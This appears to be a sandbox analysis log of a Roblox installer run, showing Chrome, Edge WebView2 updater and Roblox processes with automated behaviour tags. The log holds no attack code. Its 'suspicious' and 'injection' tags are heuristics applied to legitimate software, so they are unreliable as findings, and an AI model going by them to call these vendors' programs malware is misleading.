C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4640 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:4568
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4712 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:2736
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5180 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:12⤵PID:3776
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3452 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:12⤵PID:4080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:3224
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3160 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:1092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5860 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:3004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1672 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:3012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=812 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:704
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4736 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:2612
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5596 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:1748
-
-
C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe"C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
PID:1852 -
C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exeMicrosoftEdgeWebview2Setup.exe /silent /install3⤵
- Executes dropped EXE
PID:1360 -
C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"4⤵
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- Suspicious behavior: EnumeratesProcesses
PID:4872 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc5⤵
- Executes dropped EXE
- Modifies registry class
PID:200
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:4056 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:3604
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:1168
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:4332
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MjVENzYwMzgtOTYzMS00MUI3LTk4NjQtMkExMUQ3N0QzRkJGfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9InswNzcwMzIyOS01ODY5LTQ3NzUtQjJCMS1DMzNDMTgwQjU5RjJ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iUUVNVSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIiIG5leHR2ZXJzaW9uPSIxLjMuMTcxLjM5IiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI2NTAwNTQxNjQwIiBpbnN0YWxsX3RpbWVfbXM9IjgxNSIvPjwvYXBwPjwvcmVxdWVzdD45⤵
- Executes dropped EXE
- Checks system information in the registry
PID:1400
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{25D76038-9631-41B7-9864-2A11D77D3FBF}" /silent5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2832
-
-
-
-
C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe" -app -isInstallerLaunch3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of UnmapMainImage
PID:596
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5664 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:1124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5764 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:3932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=4872 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:12⤵PID:3004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5188 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:12⤵PID:3804
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:1052
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- Modifies data under HKEY_USERS
PID:2780 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MjVENzYwMzgtOTYzMS00MUI3LTk4NjQtMkExMUQ3N0QzRkJGfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9InszOUQwQ0M1OS00OTVBLTQ1MDctOEIwMS0zMTZEMzIyQTU4QjB9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iUUVNVSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O3I0NTJ0MStrMlRncS9IWHpqdkZOQlJob3BCV1I5c2JqWHhxZVVESDl1WDA9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEwNi4wLjUyNDkuMTE5IiBuZXh0dmVyc2lvbj0iMTA2LjAuNTI0OS4xMTkiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIzIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI2NTA1NTIxNTM4Ii8-PC9hcHA-PC9yZXF1ZXN0Pg2⤵
- Executes dropped EXE
- Checks system information in the registry
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1740
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\MicrosoftEdge_X64_126.0.2592.68.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\MicrosoftEdge_X64_126.0.2592.68.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level2⤵
- Executes dropped EXE
PID:872 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\MicrosoftEdge_X64_126.0.2592.68.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2272 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=126.0.6478.114 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=126.0.2592.68 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7ff78bb9aa40,0x7ff78bb9aa4c,0x7ff78bb9aa584⤵
- Executes dropped EXE
PID:4720
-
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MjVENzYwMzgtOTYzMS00MUI3LTk4NjQtMkExMUQ3N0QzRkJGfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9InsxRjJDNUI0RS1BNzM1LTQxQzgtOEQwMy03NkZCNDE0OThGMDl9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iUUVNVSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O1ZQUW9QMUYrZnExNXdSemgxa1BMNFBNcFdoOE9STUI1aXp2ck9DL2NoalE9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzMDE3MjI2LUZFMkEtNDI5NS04QkRGLTAwQzNBOUE3RTRDNX0iIHZlcnNpb249IiIgbmV4dHZlcnNpb249IjEyNi4wLjI1OTIuNjgiIGxhbmc9IiIgYnJhbmQ9IiIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSItMSIgaW5zdGFsbGRhdGU9Ii0xIj48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjkiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjY1NDAzMzE2MzkiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI2NTQwNDIxODA0IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzI4MjAxMzY0NCIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vbXNlZGdlLmYudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvYWM2ZjYxMWItZWViNy00YTQyLWE2ZDQtOGNkNzE0Mjk2YTExP1AxPTE3MjAwNDk4NTImYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9bU1SQThtWG9oNTBlbmdoMEN0YnhHN29tRFJlb3JYUHNvMjN4ajNHT0Y5SVl1JTJmTTdpQU90bnFzeWRhcjlLSDF6Qk9RREVSMEFsZE1QQVExdWZoWWt6ZyUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE3Mjk1NzI0MCIgdG90YWw9IjE3Mjk1NzI0MCIgZG93bmxvYWRfdGltZV9tcz0iNzAyMzEiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3MjgyMDkzNDkyIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzI5NTY1Mzc5MiIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5Njc1NyIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzcwMDg3ODQyNiIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9IjgzOSIgZG93bmxvYWRfdGltZV9tcz0iNzQxNjQiIGRvd25sb2FkZWQ9IjE3Mjk1NzI0MCIgdG90YWw9IjE3Mjk1NzI0MCIgcGFja2FnZV9jYWNoZV9yZXN1bHQ9IjAiIGluc3RhbGxfdGltZV9tcz0iNDA1MTkiLz48L2FwcD48L3JlcXVlc3Q-2⤵
- Executes dropped EXE
- Checks system information in the registry
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1316
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /01⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:580
-
C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of UnmapMainImage
PID:592
-
C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of UnmapMainImage
PID:4844
-
C:\Windows\system32\SystemPropertiesRemote.exe"C:\Windows\system32\SystemPropertiesRemote.exe"1⤵PID:1732
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"1⤵PID:2052
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4756
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- Modifies data under HKEY_USERS
PID:2464 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B03F6FE8-253D-4C99-BADE-CFBCA90582C0}\MicrosoftEdgeUpdateSetup_X86_1.3.187.41.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B03F6FE8-253D-4C99-BADE-CFBCA90582C0}\MicrosoftEdgeUpdateSetup_X86_1.3.187.41.exe" /update /sessionid "{681D8A3C-184C-4883-8C7D-55AA3487F1EC}"2⤵
- Executes dropped EXE
PID:1512 -
C:\Program Files (x86)\Microsoft\Temp\EUAE89.tmp\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\Temp\EUAE89.tmp\MicrosoftEdgeUpdate.exe" /update /sessionid "{681D8A3C-184C-4883-8C7D-55AA3487F1EC}"3⤵
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
PID:3776 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc4⤵
- Executes dropped EXE
PID:4424
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:520 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:1308
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:3120
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:872
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODcuNDEiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NjgxRDhBM0MtMTg0Qy00ODgzLThDN0QtNTVBQTM0ODdGMUVDfSIgaW5zdGFsbHNvdXJjZT0ic2VsZnVwZGF0ZSIgcmVxdWVzdGlkPSJ7QTQ0OURFMTAtNTAyNC00MEQxLUI2MEYtN0E3RjUxMzQ1REQ1fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjgiIHBoeXNtZW1vcnk9IjgiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xNTA2My4wIiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IlFFTVUiIHByb2R1Y3RfbmFtZT0iU3RhbmRhcmQgUEMgKFEzNSArIElDSDksIDIwMDkpIi8-PGV4cCBldGFnPSImcXVvdDtyNDUydDErazJUZ3EvSFh6anZGTkJSaG9wQldSOXNialh4cWVVREg5dVgwPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC